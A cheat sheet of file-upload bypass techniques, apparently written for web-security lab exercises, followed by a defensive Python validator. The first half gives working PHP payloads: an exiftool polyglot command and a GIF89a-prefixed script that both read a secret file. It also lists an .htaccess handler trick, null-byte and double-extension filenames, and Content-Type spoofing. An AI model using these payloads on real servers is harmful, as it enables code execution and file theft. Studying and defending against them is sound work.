File Upload
Upload a file whose name includes an obfuscated path traversal sequence, such as ..%2fexploit.php, and then retrieve the content with GET /files/avatars/..%2fexploit.php.

Upload a file named exploit.php%00.jpg, with a trailing null byte in the name, and get the file executed at /files/avatars/exploit.php.

Create a polyglot from a valid image file by running the following command in a bash terminal:

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./stickman.png -o polyglot2023.php

Once the polyglot is uploaded, view the extracted data by issuing a GET request to the uploaded path /files/avatars/polyglot.php, and search the response content for the phrase START to obtain the sensitive data.

Upload two different files. First upload .htaccess with Content-Type: text/plain and the file data set to AddType application/x-httpd-php .l33t. This allows the upload and execution of a second file named exploit.l33t, with the extension l33t.

Only the MIME types image/jpeg or image/png are allowed. Bypass the filter by setting Content-Type to the value image/jpeg and then uploading the exploit.php file.

If the target allows Remote File Include (RFI), upload from a remote URL: host the exploit file with the following GIF magic bytes:

GIF89a; <?php echo file_get_contents('/home/carlos/secret'); ?>

The file name on the exploit server could read image.php%00.gif.

Double file extension to bypass the filter: exploit.csv.php.
File extension bypass:
- Extension with varied capitalization, such as .sVG
- Double extension, such as .jpg.svg or .svg.jpg
- Extension with a delimiter, such as %0a, %09, %0d, %00, or #. Other examples: file.png%00.svg or file.png\x0d\x0a.svg
- Empty filename, such as .svg
- Try to cut the allowed extension off by exceeding the maximum filename length.
XSS via SVG upload.
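As an added defensive example (not part of the original notes), the following Python upload validator rejects each of the bypass names listed above: percent-encoded traversal, null-byte and CRLF delimiters, dotfiles such as .htaccess, multiple extensions, case variants, overlong names, Content-Type and magic-byte mismatches, and script markers hidden after a valid image header (polyglots). The allow-list, length limit and marker list are assumptions chosen for this example.

```python
import re
import secrets
from urllib.parse import unquote
# Assumed allow-list: extension -> (required magic bytes, required Content-Type).
ALLOWED = {".jpg": (b"\xff\xd8\xff", "image/jpeg"),
           ".jpeg": (b"\xff\xd8\xff", "image/jpeg"),
           ".png": (b"\x89PNG\r\n\x1a\n", "image/png")}
MAX_NAME_LEN = 64  # assumed limit, enforced before any storage layer could truncate the name
# Heuristic markers for script payloads embedded after a valid image header (polyglots).
SUSPICIOUS = (b"<?php", b"<?=", b"<script", b"<svg")

def normalize_name(raw: str) -> str:
    """Percent-decode until stable (bounded) so ..%2f and double-encoded %252f cannot survive."""
    name = raw
    for _ in range(3):
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    return name

def check_filename(raw: str):
    """Return (ok, reason, ext). Rejects traversal, control bytes, dotfiles and multi-dot names."""
    name = normalize_name(raw)
    if not 0 < len(name) <= MAX_NAME_LEN:
        return False, "bad length", None
    if re.search(r"[\x00-\x1f\x7f/\\]", name) or ".." in name:
        return False, "traversal or control character", None
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem or "." in stem:
        return False, "missing, empty-stem, or multiple extensions", None
    ext = "." + ext.lower()  # case-fold so .sVG is judged as .svg
    if ext not in ALLOWED:
        return False, "extension not allowed: " + ext, None
    return True, "ok", ext

def validate_upload(raw_name: str, content_type: str, data: bytes):
    """Check name, declared Content-Type, magic bytes and payload. Returns (ok, reason, stored_name)."""
    ok, reason, ext = check_filename(raw_name)
    if not ok:
        return False, reason, None
    magic, expected_ct = ALLOWED[ext]
    if content_type.split(";")[0].strip().lower() != expected_ct:
        return False, "Content-Type does not match extension", None
    if not data.startswith(magic):
        return False, "magic bytes do not match extension", None
    if any(marker in data.lower() for marker in SUSPICIOUS):
        return False, "embedded script marker (possible polyglot)", None
    # Never reuse the client's name on disk: store under a random name in a non-executable directory.
    return True, "ok", secrets.token_hex(16) + ext
```

Serving the stored file back with a fixed Content-Type and from a directory the web server will not execute closes the .htaccess and polyglot cases even if a marker is missed.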